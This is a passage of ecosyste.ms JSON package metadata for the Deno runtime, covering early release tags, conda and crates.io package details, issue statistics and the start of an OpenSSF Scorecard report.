syste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:24:46.138Z","dependent_packages_count":2,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":34.025455452957324,"dependent_packages_count":19.505864736710755,"stargazers_count":0.06987771400049912,"forks_count":1.3975542800099825,"average":13.74968804591964},"purl":"pkg:conda/deno?repository_url=https://conda-forge.org","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/deno/codemeta","maintainers":[],"registry":{"name":"conda-forge.org","url":"https://conda-forge.org","ecosystem":"conda","default":false,"packages_count":20636,"maintainers_count":0,"namespaces_count":0,"keywords_count":13549,"github":"conda-forge","metadata":{"kind":"conda-forge","key":"CondaForge","api":"https://conda.anaconda.org","funded_packages_count":2368},"icon_url":"https://github.com/conda-forge.png","created_at":"2022-10-03T15:37:08.743Z","updated_at":"2026-09-04T05:06:19.084Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/namespaces"}},{"id":11066817,"name":"deno_lib","ecosystem":"cargo","description":"Shared code between the Deno CLI and denort","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":84,"first_release_published_at":"2024-11-20T07:50:02.859Z","latest_release_published_at":"2025-04-30T10:54:18.966Z","latest_release_number":"2.3.1","last_synced_at":"2026-09-07T22:54:31.078Z","created_at":"2024-11-20T08:01:03.803Z","updated_at":"2026-09-07T22:54:31.078Z","registry_url":"https://crates.io/crates/deno_lib/","install_command":"cargo install deno_lib","documentation_url":"https://docs.rs/deno_lib/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release 